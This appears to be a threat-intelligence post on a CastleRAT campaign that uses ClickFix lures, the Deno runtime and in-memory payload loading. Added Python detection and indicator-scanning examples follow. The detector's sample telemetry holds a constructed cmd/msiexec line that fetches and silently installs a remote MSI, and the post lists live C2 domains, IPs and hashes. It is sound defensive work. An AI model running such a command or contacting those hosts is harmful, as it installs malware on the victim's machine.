ThreatDown Research recently documented the first known use of the Deno JavaScript runtime in a CastleRAT attack, a notable development for defenders. The attack chain gets around standard security measures, marking a real step forward in tradecraft for the criminals behind it. The campaign abuses Deno, a well-known and trusted runtime environment, in a novel way to run CastleRAT, a capable tool for spying and data theft.
This attack shows how creative and stealthy modern malware campaigns have become, with attackers doing everything they can to avoid being caught.

The "ClickFix" social engineering trap and Deno abuse

The attack starts with a simple but effective social engineering trick called ClickFix, which tricks the victim into pasting a command into the Windows terminal to "fix" a browser error or CAPTCHA.
Because the user runs the command themselves, the malicious installer is downloaded silently and standard web security controls are sidestepped. The method exploits human error rather than a software flaw, which makes it harder to block and more likely to succeed.

[Figure: What CastleRAT does (source: ThreatDown)]

Once the attackers have a foothold on the system, they do not drop malware right away. Instead, they install Deno, a trusted and legitimate runtime. Antivirus software usually does not flag the Deno installation because the installer carries a valid digital signature.

[Figure: How CastleRAT works (source: ThreatDown)]

This sets up the next step: the attackers use Deno as a Trojan horse to run obfuscated JavaScript. Because Deno is a trusted process, the malware runs with higher privileges, which makes it hard for traditional detection systems to spot.
Stealthy execution and delivery of the CastleRAT payload

Once the Deno runtime is in place, the attackers hide their activity even further. Deno runs JavaScript that downloads a Python environment, disguised under the name Petuhon, together with a JPEG image (CFBAT.jpg). The image appears benign but carries an encrypted CastleRAT payload.
Using a technique called reflective PE loading, the PyArmor-protected Python script decodes the payload directly into memory, so the malware never touches the disk.

[Figure: CastleRAT uses Deno for evasion (source: ThreatDown)]

This approach hides the payload from file-scanning antivirus engines, which means most security tools never get a chance to see it. Once running, CastleRAT reports back to a command-and-control (C2) server.
The malware also uses low-level Windows APIs to steal data, log keystrokes, and hijack the clipboard. It targets sensitive information such as cryptocurrency wallet files, browsing history, and developer credentials. ThreatDown's research concludes that organisations need behavioral monitoring and endpoint detection and response (EDR) tooling to defend against threats of this kind.
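As an added example (not ThreatDown's code or data), the following Python sketches how the behavioural monitoring the article recommends could be expressed over process-creation telemetry: it flags a shell launched directly from the desktop that fetches an installer (the shape of a pasted ClickFix command), the Deno runtime spawning a Python interpreter, and a Deno-descended Python process making an outbound connection. The event records, field names and command lines are constructed and only loosely modelled on Sysmon-style data; the destination IP is the C2 address from the article's indicator list.

```python
# Added example, not ThreatDown's code: a minimal behavioural detector for the
# process chain the article describes. Events and field names are constructed.
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str


# Constructed sample telemetry reproducing the chain from the article:
# shell launched from the desktop -> installer -> Deno -> Python -> network.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1,   "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "cmd.exe",      "cmd.exe /c msiexec /i https://example.invalid/Clickzpaqkvba.msi /qn"),
    ProcEvent(300, 200, "msiexec.exe",  "msiexec /i https://example.invalid/Clickzpaqkvba.msi /qn"),
    ProcEvent(400, 300, "deno.exe",     "deno run -A loader.js"),
    ProcEvent(500, 400, "python.exe",   "python.exe stage2.py"),
]
# (pid, destination ip, destination port); constructed, the IP is the C2
# address listed in the article's indicators.
SAMPLE_NET: List[Tuple[int, str, int]] = [(500, "172.86.123.222", 443)]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
INSTALLER_RE = re.compile(r"msiexec|\.msi\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _by_pid(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}


def ancestors(pid: int, index: Dict[int, ProcEvent]) -> Iterator[str]:
    """Yield image names of the process's ancestors, nearest parent first."""
    seen = set()
    cur = index.get(pid)
    while cur is not None and cur.ppid in index and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = index[cur.ppid]
        yield cur.image


def detect(events: List[ProcEvent],
           net_events: List[Tuple[int, str, int]]) -> List[Tuple[str, int]]:
    """Return (rule, pid) alerts for the chain described in the article."""
    index = _by_pid(events)
    alerts: List[Tuple[str, int]] = []
    for e in events:
        parent = index.get(e.ppid)
        # Rule 1: a shell launched directly under the desktop shell whose
        # command line fetches an installer from a URL.
        if (e.image in SHELLS and parent is not None and parent.image == "explorer.exe"
                and INSTALLER_RE.search(e.cmdline) and URL_RE.search(e.cmdline)):
            alerts.append(("clickfix_shell_installer", e.pid))
        # Rule 2: the Deno runtime spawning a Python interpreter.
        if e.image == "python.exe" and parent is not None and parent.image == "deno.exe":
            alerts.append(("deno_spawns_python", e.pid))
    # Rule 3: a Python process descended from Deno making an outbound connection.
    for pid, _ip, _port in net_events:
        e = index.get(pid)
        if e is not None and e.image == "python.exe" and "deno.exe" in ancestors(pid, index):
            alerts.append(("deno_python_network", pid))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS, SAMPLE_NET):
        print(f"ALERT {rule} pid={pid}")
```

Rule 1 keys on the parent/child shape rather than on a specific command string, so trivial rewording of the pasted command does not defeat it; rules 2 and 3 key on the runtime relationship (a signed, trusted Deno binary should not normally be the parent of a Python interpreter that then talks to the network), which is exactly the behaviour a signature-only check misses.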
Indicators of compromise (defanged):
C2 domain: dsennbuappec[.]zhivachkapro[.]com
C2 domain: serialmenot[.]com
IP address: 172.86.123.222
SHA256 hash: aae017e7a36e016655c91bd01b4f3c46309bbe540733f82cce29392e72e9bd1f
IP address: 23[.]94.145.120
SHA256 hash: a4787a42070994b7f1222025828faf9b153710bb730e58da710728e148282e28
Associated files: Clickzpaqkvba.msi, november_block25.vbs
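As an added example (not ThreatDown's code), the following Python normalises the defanged indicators above so they can be matched against logs, then runs them over a few constructed DNS, proxy and EDR log lines. The log format, host names and file path are constructed; the indicator values are the ones published in the article.

```python
# Added example, not ThreatDown's code: refang the article's indicators and
# scan constructed log lines for them.
import re
from typing import Dict, List, Tuple

# Indicators as printed in the article (defanged). Category labels are ours.
IOCS_DEFANGED: Dict[str, List[str]] = {
    "c2_domain": ["dsennbuappec[.]zhivachkapro[.]com", "serialmenot[.]com"],
    "ip": ["172.86.123.222", "23[.]94.145.120"],
    "sha256": ["aae017e7a36e016655c91bd01b4f3c46309bbe540733f82cce29392e72e9bd1f",
               "a4787a42070994b7f1222025828faf9b153710bb730e58da710728e148282e28"],
    "file": ["Clickzpaqkvba.msi", "november_block25.vbs"],
}

# Constructed log lines; the host names, timestamps and path are made up.
SAMPLE_LOGS: List[str] = [
    "2025-11-03T10:12:01Z dns host=WS-42 qname=serialmenot.com rcode=NOERROR",
    "2025-11-03T10:12:05Z proxy host=WS-42 CONNECT 172.86.123.222:443",
    "2025-11-03T10:12:09Z edr host=WS-42 event=file_write file=november_block25.vbs",
    "2025-11-03T10:12:12Z edr host=WS-42 event=hash sha256=AAE017E7A36E016655C91BD01B4F3C46309BBE540733F82CCE29392E72E9BD1F path=C:\\Users\\u\\Downloads\\sample.bin",
    "2025-11-03T10:13:00Z dns host=WS-07 qname=updates.example.invalid rcode=NOERROR",
]


def refang(value: str) -> str:
    """Turn common defanging forms ('[.]', '[. ]', 'hxxp') back into real values."""
    v = re.sub(r"\[\s*\.\s*\]", ".", value)
    v = re.sub(r"^hxxp", "http", v, flags=re.IGNORECASE)
    return v


def defang(value: str) -> str:
    """Inverse of refang for hosts and IPs, for safe display in reports."""
    return value.replace(".", "[.]")


def load_iocs() -> Dict[str, List[str]]:
    return {kind: [refang(v) for v in vals] for kind, vals in IOCS_DEFANGED.items()}


TOKEN_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def scan_lines(lines: List[str], iocs: Dict[str, List[str]]) -> List[Tuple[int, str, str]]:
    """Return (line_no, kind, indicator) hits. Domains also match subdomains,
    hashes match case-insensitively, IPs and file names match by exact token."""
    domains = iocs["c2_domain"]
    ips = set(iocs["ip"])
    hashes = {h.lower() for h in iocs["sha256"]}
    files = set(iocs["file"])
    hits: List[Tuple[int, str, str]] = []
    for n, line in enumerate(lines, 1):
        for tok in TOKEN_RE.findall(line):
            low = tok.lower()
            if tok in ips:
                hits.append((n, "ip", tok))
            elif low in hashes:
                hits.append((n, "sha256", low))
            elif tok in files:
                hits.append((n, "file", tok))
            else:
                for d in domains:
                    if low == d or low.endswith("." + d):
                        hits.append((n, "c2_domain", d))
                        break
    return hits


if __name__ == "__main__":
    for n, kind, ind in scan_lines(SAMPLE_LOGS, load_iocs()):
        shown = defang(ind) if kind in ("ip", "c2_domain") else ind
        print(f"line {n}: {kind} {shown}")
```

Matching on whole tokens rather than substrings avoids false hits on longer names that merely contain an indicator, and treating C2 domains as suffixes catches subdomains that a feed would otherwise miss.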
This new kind of attack shows why security strategies must move beyond static defenses and focus on detecting and stopping suspicious behavior.